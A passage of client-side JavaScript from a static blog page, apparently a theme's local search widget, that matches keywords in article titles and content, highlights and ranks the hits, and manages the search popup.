                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
